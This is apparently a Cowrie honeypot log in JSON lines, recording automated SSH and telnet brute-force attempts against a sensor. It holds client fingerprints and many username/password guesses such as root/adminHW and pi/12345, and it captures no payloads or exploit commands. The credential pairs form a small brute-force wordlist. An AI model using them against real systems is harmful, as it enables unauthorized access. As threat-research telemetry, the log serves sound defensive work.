{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:58:55.047158Z","src_ip":"212.227.125.160","session":"503d6a8daa90"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:58:55.511143Z","src_ip":"212.227.125.160","session":"503d6a8daa90"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-28T11:58:55.512487Z","src_ip":"212.227.125.160","session":"503d6a8daa90"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-28T11:58:55.513336Z","src_ip":"212.227.125.160","session":"503d6a8daa90"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":42224,"dst_ip":"1.2.3.4","dst_port":23,"session":"700736694a37","protocol":"telnet","message":"New connection: 79.124.8.120:42224 (1.2.3.4:23) [session: 700736694a37]","sensor":"my-vps","timestamp":"2025-08-28T11:58:56.624557Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:58:56.664218Z","src_ip":"79.124.8.120","session":"700736694a37"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:58:56.685164Z","src_ip":"79.124.8.120","session":"700736694a37"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53780,"dst_ip":"1.2.3.4","dst_port":22,"session":"8264c8e160eb","protocol":"ssh","message":"New connection: 212.227.125.160:53780 (1.2.3.4:22) [session: 8264c8e160eb]","sensor":"my-vps","timestamp":"2025-08-28T11:59:17.183348Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:59:17.190368Z","src_ip":"212.227.125.160","session":"8264c8e160eb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:59:17.352333Z","src_ip":"212.227.125.160","session":"8264c8e160eb"}
{"eventid":"cowrie.login.failed","username":"pi","password":"password","message":"login attempt [pi/password] failed","sensor":"my-vps","timestamp":"2025-08-28T11:59:18.188533Z","src_ip":"212.227.125.160","session":"8264c8e160eb"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:59:19.359071Z","src_ip":"212.227.125.160","session":"8264c8e160eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":62498,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d475cde24a5","protocol":"ssh","message":"New connection: 212.227.125.160:62498 (1.2.3.4:22) [session: 6d475cde24a5]","sensor":"my-vps","timestamp":"2025-08-28T11:59:20.354343Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T11:59:20.355297Z","src_ip":"212.227.125.160","session":"6d475cde24a5"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T11:59:20.479768Z","src_ip":"212.227.125.160","session":"6d475cde24a5"}
{"eventid":"cowrie.login.failed","username":"user","password":"amsterdam","message":"login attempt [user/amsterdam] failed","sensor":"my-vps","timestamp":"2025-08-28T11:59:21.211224Z","src_ip":"212.227.125.160","session":"6d475cde24a5"}
{"eventid":"cowrie.login.failed","username":"user","password":"1959","message":"login attempt [user/1959] failed","sensor":"my-vps","timestamp":"2025-08-28T11:59:22.338027Z","src_ip":"212.227.125.160","session":"6d475cde24a5"}
{"eventid":"cowrie.login.failed","username":"user","password":"webmaster","message":"login attempt [user/webmaster] failed","sensor":"my-vps","timestamp":"2025-08-28T11:59:23.824425Z","src_ip":"212.227.125.160","session":"6d475cde24a5"}
{"eventid":"cowrie.login.failed","username":"user","password":"valley","message":"login attempt [user/valley] failed","sensor":"my-vps","timestamp":"2025-08-28T11:59:24.944375Z","src_ip":"212.227.125.160","session":"6d475cde24a5"}
{"eventid":"cowrie.login.failed","username":"user","password":"space","message":"login attempt [user/space] failed","sensor":"my-vps","timestamp":"2025-08-28T11:59:26.064751Z","src_ip":"212.227.125.160","session":"6d475cde24a5"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:59:27.538045Z","src_ip":"212.227.125.160","session":"6d475cde24a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42452,"dst_ip":"1.2.3.4","dst_port":22,"session":"65b06f2f3379","protocol":"ssh","message":"New connection: 212.227.125.160:42452 (1.2.3.4:22) [session: 65b06f2f3379]","sensor":"my-vps","timestamp":"2025-08-28T11:59:57.479099Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:59:57.480313Z","src_ip":"212.227.125.160","session":"65b06f2f3379"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:59:57.649549Z","src_ip":"212.227.125.160","session":"65b06f2f3379"}
{"eventid":"cowrie.login.failed","username":"pi","password":"123456789","message":"login attempt [pi/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T11:59:58.161812Z","src_ip":"212.227.125.160","session":"65b06f2f3379"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:59:59.333197Z","src_ip":"212.227.125.160","session":"65b06f2f3379"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55734,"dst_ip":"1.2.3.4","dst_port":22,"session":"7105504b6938","protocol":"ssh","message":"New connection: 212.227.125.160:55734 (1.2.3.4:22) [session: 7105504b6938]","sensor":"my-vps","timestamp":"2025-08-28T12:00:42.299202Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:00:42.312448Z","src_ip":"212.227.125.160","session":"7105504b6938"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:00:42.476557Z","src_ip":"212.227.125.160","session":"7105504b6938"}
{"eventid":"cowrie.login.failed","username":"pi","password":"12345","message":"login attempt [pi/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T12:00:43.279338Z","src_ip":"212.227.125.160","session":"7105504b6938"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:00:44.459115Z","src_ip":"212.227.125.160","session":"7105504b6938"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":18995,"dst_ip":"1.2.3.4","dst_port":22,"session":"c573d6960a8e","protocol":"ssh","message":"New connection: 212.227.235.229:18995 (1.2.3.4:22) [session: c573d6960a8e]","sensor":"my-vps","timestamp":"2025-08-28T12:01:23.551907Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T12:01:23.552738Z","src_ip":"212.227.235.229","session":"c573d6960a8e"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T12:01:23.687177Z","src_ip":"212.227.235.229","session":"c573d6960a8e"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"daemon","message":"login attempt [daemon/daemon] failed","sensor":"my-vps","timestamp":"2025-08-28T12:01:24.280451Z","src_ip":"212.227.235.229","session":"c573d6960a8e"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"abc123","message":"login attempt [daemon/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T12:01:25.409867Z","src_ip":"212.227.235.229","session":"c573d6960a8e"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"abcd123","message":"login attempt [daemon/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T12:01:26.538368Z","src_ip":"212.227.235.229","session":"c573d6960a8e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58816,"dst_ip":"1.2.3.4","dst_port":22,"session":"882216f076d5","protocol":"ssh","message":"New connection: 212.227.125.160:58816 (1.2.3.4:22) [session: 882216f076d5]","sensor":"my-vps","timestamp":"2025-08-28T12:01:27.577856Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:01:27.579016Z","src_ip":"212.227.125.160","session":"882216f076d5"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"abcd1234","message":"login attempt [daemon/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T12:01:27.667349Z","src_ip":"212.227.235.229","session":"c573d6960a8e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:01:27.748502Z","src_ip":"212.227.125.160","session":"882216f076d5"}
{"eventid":"cowrie.login.failed","username":"pi","password":"12345678","message":"login attempt [pi/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T12:01:28.438395Z","src_ip":"212.227.125.160","session":"882216f076d5"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"abc1234","message":"login attempt [daemon/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T12:01:28.795007Z","src_ip":"212.227.235.229","session":"c573d6960a8e"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:01:29.717508Z","src_ip":"212.227.125.160","session":"882216f076d5"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:01:29.932666Z","src_ip":"212.227.235.229","session":"c573d6960a8e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52752,"dst_ip":"1.2.3.4","dst_port":22,"session":"52aad03cb148","protocol":"ssh","message":"New connection: 212.227.235.229:52752 (1.2.3.4:22) [session: 52aad03cb148]","sensor":"my-vps","timestamp":"2025-08-28T12:01:36.562375Z"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:01:37.391685Z","src_ip":"212.227.235.229","session":"52aad03cb148"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53114,"dst_ip":"1.2.3.4","dst_port":22,"session":"53607348bdcb","protocol":"ssh","message":"New connection: 212.227.235.229:53114 (1.2.3.4:22) [session: 53607348bdcb]","sensor":"my-vps","timestamp":"2025-08-28T12:01:37.726341Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_7.4","message":"Remote SSH version: SSH-2.0-OpenSSH_7.4","sensor":"my-vps","timestamp":"2025-08-28T12:01:37.820298Z","src_ip":"212.227.235.229","session":"53607348bdcb"}
{"eventid":"cowrie.client.kex","hassh":"ec9ea89c70f5fc71cf61061bff5e4740","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: ec9ea89c70f5fc71cf61061bff5e4740","sensor":"my-vps","timestamp":"2025-08-28T12:01:37.869655Z","src_ip":"212.227.235.229","session":"53607348bdcb"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:01:38.170064Z","src_ip":"212.227.235.229","session":"53607348bdcb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53648,"dst_ip":"1.2.3.4","dst_port":22,"session":"e32b41afdf61","protocol":"ssh","message":"New connection: 212.227.235.229:53648 (1.2.3.4:22) [session: e32b41afdf61]","sensor":"my-vps","timestamp":"2025-08-28T12:01:39.406211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_7.4","message":"Remote SSH version: SSH-2.0-OpenSSH_7.4","sensor":"my-vps","timestamp":"2025-08-28T12:01:39.453256Z","src_ip":"212.227.235.229","session":"e32b41afdf61"}
{"eventid":"cowrie.client.kex","hassh":"e788c657d1a22971d5026526ffd2e918","hasshAlgorithms":"diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-cbc,3des-cbc,blowfish-cbc,aes192-cbc,aes256-cbc,aes128-ctr,aes192-ctr,aes256-ctr;hmac-md5,hmac-sha1,hmac-ripemd160;none","kexAlgs":["diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa"],"encCS":["aes128-cbc","3des-cbc","blowfish-cbc","aes192-cbc","aes256-cbc","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-md5","hmac-sha1","hmac-ripemd160"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: e788c657d1a22971d5026526ffd2e918","sensor":"my-vps","timestamp":"2025-08-28T12:01:39.497574Z","src_ip":"212.227.235.229","session":"e32b41afdf61"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:01:39.848437Z","src_ip":"212.227.235.229","session":"e32b41afdf61"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52349,"dst_ip":"1.2.3.4","dst_port":22,"session":"73dec60c7c3b","protocol":"ssh","message":"New connection: 212.227.235.229:52349 (1.2.3.4:22) [session: 73dec60c7c3b]","sensor":"my-vps","timestamp":"2025-08-28T12:01:52.512735Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:01:52.625451Z","src_ip":"212.227.235.229","session":"73dec60c7c3b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T12:01:52.937125Z","src_ip":"212.227.235.229","session":"73dec60c7c3b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41555,"dst_ip":"1.2.3.4","dst_port":23,"session":"6aaf4f716a17","protocol":"telnet","message":"New connection: 212.227.235.229:41555 (1.2.3.4:23) [session: 6aaf4f716a17]","sensor":"my-vps","timestamp":"2025-08-28T12:01:54.426887Z"}
{"eventid":"cowrie.login.success","username":"root","password":"0r968ji9ufj6","message":"login attempt [root/0r968ji9ufj6] succeeded","sensor":"my-vps","timestamp":"2025-08-28T12:01:54.944899Z","src_ip":"212.227.235.229","session":"73dec60c7c3b"}
